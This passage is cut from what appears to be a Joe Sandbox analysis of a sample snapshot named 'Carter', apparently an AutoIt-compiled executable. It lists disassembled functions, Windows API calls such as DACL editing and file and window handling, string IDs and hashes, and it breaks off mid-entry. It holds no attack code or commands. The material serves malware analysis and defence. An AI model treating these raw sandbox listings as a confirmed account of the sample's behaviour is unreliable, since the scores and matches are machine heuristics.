                                                                            • Instruction ID: 7fccaff83e431817c69b4887db024bf696a12707ac7a6e068e574591a87d4144
                                                                            • Opcode Fuzzy Hash: 585440387aa9b640bcffdf4621e64c4fdc6218f988ab5188fa1a35b9d752db57
                                                                            • Instruction Fuzzy Hash: 76D1D031624516EBDB649F65D894B6EB7B8BF04B00F248197E409AB380DF70ED60DFA1
                                                                            Function 002F49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 002F4A61
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F4AAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: f30572eb4e8a3c06418ae93b6e117553ea0507a67527e7a634df9c5a71d01f94
                                                                            • Instruction ID: af30447f9408d143cb86bdf795f1bb67146aae400fc38ba5f6f8372d52f389a0
                                                                            • Opcode Fuzzy Hash: f30572eb4e8a3c06418ae93b6e117553ea0507a67527e7a634df9c5a71d01f94
                                                                            • Instruction Fuzzy Hash: 8591AC342206198FCB14FF20C451A6EB7A1AF84394F10896DF9965B3A2CB70ED69CF81
                                                                            Function 002DE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 002DE31F
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 002DE32F
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002DE33B
                                                                            • __wsplitpath.LIBCMT ref: 002DE399
                                                                            • _wcscat.LIBCMT ref: 002DE3B1
                                                                            • _wcscat.LIBCMT ref: 002DE3C3
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002DE3D8
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002DE3EC
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002DE41E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002DE43F
                                                                            • _wcscpy.LIBCMT ref: 002DE44B
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002DE48A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3566783562-438819550
                                                                            • Opcode ID: c355b094affa1a85bb55015a12a24daafab1c24d5ad79cba0fbe9b88ee227011
                                                                            • Instruction ID: 167bc91ca9264e9dbfe83a54a739183fc867603a1441c0a0cefa9fc895c9f91b
                                                                            • Opcode Fuzzy Hash: c355b094affa1a85bb55015a12a24daafab1c24d5ad79cba0fbe9b88ee227011
                                                                            • Instruction Fuzzy Hash: D06138725246459FCB10EF60C884AAEB3ECBF89314F04891EF98987251DB35ED55CF92
                                                                            Function 002723F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00271F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00272412,?,00000000,?,?,?,?,00271AA7,00000000,?), ref: 00271F76
                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002724AF
                                                                            • KillTimer.USER32(-00000001,?,?,?,?,00271AA7,00000000,?,?,00271EBE,?,?), ref: 0027254A
                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 002ABFE7
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00271AA7,00000000,?,?,00271EBE,?,?), ref: 002AC018
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00271AA7,00000000,?,?,00271EBE,?,?), ref: 002AC02F
                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00271AA7,00000000,?,?,00271EBE,?,?), ref: 002AC04B
                                                                            • DeleteObject.GDI32(00000000), ref: 002AC05D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                            • String ID: h0
                                                                            • API String ID: 641708696-1319028847
                                                                            • Opcode ID: d7bbec23375540a71477ccc3271321d7450f67470959d7cbff9819544401da00
                                                                            • Instruction ID: 6d52272282472f29259f488e227707d6abc85856eb8cfc4c45f1b13bf627f7d3
                                                                            • Opcode Fuzzy Hash: d7bbec23375540a71477ccc3271321d7450f67470959d7cbff9819544401da00
                                                                            • Instruction Fuzzy Hash: BE61BD30125702DFDB3A9F14C9A9B3AB7F5FF41316F10C529E04A5AA60CB71A8A4DF90
                                                                            Function 002DA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002DA2C2
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002DA2E3
                                                                            • __swprintf.LIBCMT ref: 002DA33C
                                                                            • __swprintf.LIBCMT ref: 002DA355
                                                                            • _wprintf.LIBCMT ref: 002DA3FC
                                                                            • _wprintf.LIBCMT ref: 002DA41A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-3080491070
                                                                            • Opcode ID: 028c9e391a21a9c51857e75ac9f52e3ddc3e8b36a520171bfa13a5546ee4a9c6
                                                                            • Instruction ID: 97d56873d0cabe3f4cb121a9c0de8a984dae7a40e7873d09850fbff879d89671
                                                                            • Opcode Fuzzy Hash: 028c9e391a21a9c51857e75ac9f52e3ddc3e8b36a520171bfa13a5546ee4a9c6
                                                                            • Instruction Fuzzy Hash: C5519C71912119AACF25EBE0DD86EEEB77DAF04340F100156F505A21E2EB312E7ADF61
                                                                            Function 002D0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,002BF8B8,00000001,0000138C,00000001,00000002,00000001,?,002E3FF9,00000002), ref: 002D009A
                                                                            • LoadStringW.USER32(00000000,?,002BF8B8,00000001), ref: 002D00A3
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • GetModuleHandleW.KERNEL32(00000000,00337310,?,00000FFF,?,?,002BF8B8,00000001,0000138C,00000001,00000002,00000001,?,002E3FF9,00000002,00000001), ref: 002D00C5
                                                                            • LoadStringW.USER32(00000000,?,002BF8B8,00000001), ref: 002D00C8
                                                                            • __swprintf.LIBCMT ref: 002D0118
                                                                            • __swprintf.LIBCMT ref: 002D0129
                                                                            • _wprintf.LIBCMT ref: 002D01D2
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002D01E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 984253442-2268648507
                                                                            • Opcode ID: 4dff7a739a0c619cf12cad9398597fcd1850ab8ff76410f6f5ce530dcaf5ed79
                                                                            • Instruction ID: a7a70155f30c8a541e4db71806794aab20d881fe46c5a0977fce666ba01fb137
                                                                            • Opcode Fuzzy Hash: 4dff7a739a0c619cf12cad9398597fcd1850ab8ff76410f6f5ce530dcaf5ed79
                                                                            • Instruction Fuzzy Hash: 6A414B72812119ABCB15FBE0DD96EEEB37CAF14340F100156F505A20D2EA316F2ACF61
                                                                            Function 002DA995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • CharLowerBuffW.USER32(?,?), ref: 002DAA0E
                                                                            • GetDriveTypeW.KERNEL32 ref: 002DAA5B
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002DAAA3
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002DAADA
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002DAB08
                                                                              • Part of subcall function 00281821: _memmove.LIBCMT ref: 0028185B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 2698844021-4113822522
                                                                            • Opcode ID: b0d6bcf7a4bb2faec358b5f0e245e74d6cbea5f9e4ba9a32f2888622d1e70ddb
                                                                            • Instruction ID: c7c609db9105b3791094445b4880de64165569f6f467cf944f8601dbad23ffea
                                                                            • Opcode Fuzzy Hash: b0d6bcf7a4bb2faec358b5f0e245e74d6cbea5f9e4ba9a32f2888622d1e70ddb
                                                                            • Instruction Fuzzy Hash: D0517B751242059FC704EF10D881D6AB3F8FF98758F10896EF895972A1DB31AE26CF52
                                                                            Function 002DA832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002DA852
                                                                            • __swprintf.LIBCMT ref: 002DA874
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 002DA8B1
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002DA8D6
                                                                            • _memset.LIBCMT ref: 002DA8F5
                                                                            • _wcsncpy.LIBCMT ref: 002DA931
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002DA966
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002DA971
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 002DA97A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 002DA984
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 2733774712-3457252023
                                                                            • Opcode ID: 6ae8265724a92a68fe1e46b90aadad833640848b804113250ce484e20c854ef3
                                                                            • Instruction ID: b90ba7d983670fb71376967570d06ad1ddb039545d71fce99ecc8938029f7a52
                                                                            • Opcode Fuzzy Hash: 6ae8265724a92a68fe1e46b90aadad833640848b804113250ce484e20c854ef3
                                                                            • Instruction Fuzzy Hash: AD31B27591011AABDB22DFA0DC49FEB73BCEF89700F1041B7F909D2160EB709A558B25
                                                                            Function 002FC0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002F982C,?,?), ref: 002FC0C8
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC0DF
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC0EA
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC0F7
                                                                            • GlobalLock.KERNEL32(00000000), ref: 002FC100
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC10F
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 002FC118
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC11F
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002F982C,?,?,00000000,?), ref: 002FC130
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00303C7C,?), ref: 002FC149
                                                                            • GlobalFree.KERNEL32(00000000), ref: 002FC159
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 002FC17D
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002FC1A8
                                                                            • DeleteObject.GDI32(00000000), ref: 002FC1D0
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002FC1E6
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: 946591c42dd2df72cfdaefefb9867b80412483db158a9a17b020ed72f5e95cb8
                                                                            • Instruction ID: ac1a25dd85e76ae3312f04499e51f90372eb71cc7b1e1974799e91db32ea4d2e
                                                                            • Opcode Fuzzy Hash: 946591c42dd2df72cfdaefefb9867b80412483db158a9a17b020ed72f5e95cb8
                                                                            • Instruction Fuzzy Hash: 4C417B74501209EFCB268F64CC88FABBBBCEF89751F104069F90AE7260CB319951CB60
                                                                            Function 002FC854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002FC8A4
                                                                            • GetFocus.USER32 ref: 002FC8B4
                                                                            • GetDlgCtrlID.USER32(00000000), ref: 002FC8BF
                                                                            • _memset.LIBCMT ref: 002FC9EA
                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002FCA15
                                                                            • GetMenuItemCount.USER32(?), ref: 002FCA35
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 002FCA48
                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002FCA7C
                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002FCAC4
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002FCAFC
                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002FCB31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1296962147-4108050209
                                                                            • Opcode ID: 01e2cfef103f64c2f5f5c10bf0e2486a9eea92a90a9e24e5df2560fe1b657847
                                                                            • Instruction ID: e4d4844aa4a75b3410e729f6357ad44e49dd62d7857fa33eabb30babb8b4f4b2
                                                                            • Opcode Fuzzy Hash: 01e2cfef103f64c2f5f5c10bf0e2486a9eea92a90a9e24e5df2560fe1b657847
                                                                            • Instruction Fuzzy Hash: 4A819E7011830E9FD715CF14CA85A7ABBE8FB88394F20492EFA9593291C770D925CF92
                                                                            Function 002C8ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C8E3C
                                                                              • Part of subcall function 002C8E20: GetLastError.KERNEL32(?,002C8900,?,?,?), ref: 002C8E46
                                                                              • Part of subcall function 002C8E20: GetProcessHeap.KERNEL32(00000008,?,?,002C8900,?,?,?), ref: 002C8E55
                                                                              • Part of subcall function 002C8E20: HeapAlloc.KERNEL32(00000000,?,002C8900,?,?,?), ref: 002C8E5C
                                                                              • Part of subcall function 002C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C8E73
                                                                              • Part of subcall function 002C8EBD: GetProcessHeap.KERNEL32(00000008,002C8916,00000000,00000000,?,002C8916,?), ref: 002C8EC9
                                                                              • Part of subcall function 002C8EBD: HeapAlloc.KERNEL32(00000000,?,002C8916,?), ref: 002C8ED0
                                                                              • Part of subcall function 002C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002C8916,?), ref: 002C8EE1
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C8B2E
                                                                            • _memset.LIBCMT ref: 002C8B43
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002C8B62
                                                                            • GetLengthSid.ADVAPI32(?), ref: 002C8B73
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 002C8BB0
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C8BCC
                                                                            • GetLengthSid.ADVAPI32(?), ref: 002C8BE9
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002C8BF8
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 002C8BFF
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002C8C20
                                                                            • CopySid.ADVAPI32(00000000), ref: 002C8C27
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002C8C58
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C8C7E
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C8C92
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: 40478368af88b47f53e5d3e5d800b60f4b525aa8ca24ed727c21c2a4d867c9d1
                                                                            • Instruction ID: c6ca0c321aa9a70842f5de1004b81f4756adb24701de8c92c1707881165ba87b
                                                                            • Opcode Fuzzy Hash: 40478368af88b47f53e5d3e5d800b60f4b525aa8ca24ed727c21c2a4d867c9d1
                                                                            • Instruction Fuzzy Hash: C861587591120AAFDF19DFA4DC44FEEBB79FF04300F04826AF915A6290DB319A25CB60
                                                                            Function 002E7A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 002E7A79
                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002E7A85
                                                                            • CreateCompatibleDC.GDI32(?), ref: 002E7A91
                                                                            • SelectObject.GDI32(00000000,?), ref: 002E7A9E
                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002E7AF2
                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002E7B2E
                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002E7B52
                                                                            • SelectObject.GDI32(00000006,?), ref: 002E7B5A
                                                                            • DeleteObject.GDI32(?), ref: 002E7B63
                                                                            • DeleteDC.GDI32(00000006), ref: 002E7B6A
                                                                            • ReleaseDC.USER32(00000000,?), ref: 002E7B75
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            • Opcode ID: 58e189a5773dbb60fef7ddc55f7cb676e5168fac3f10b718e1cd12155a8d14b8
                                                                            • Instruction ID: 713aaba1590dd1ab87e97d6edd13a74d08956c57270ee96f60fc7acfd14721f6
                                                                            • Opcode Fuzzy Hash: 58e189a5773dbb60fef7ddc55f7cb676e5168fac3f10b718e1cd12155a8d14b8
                                                                            • Instruction Fuzzy Hash: B5515871944349EFCB15CFA9CC84FAEBBB9EF48310F14842EF94AA7210D731A9508B60
                                                                            Function 002DA48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002DA4D4
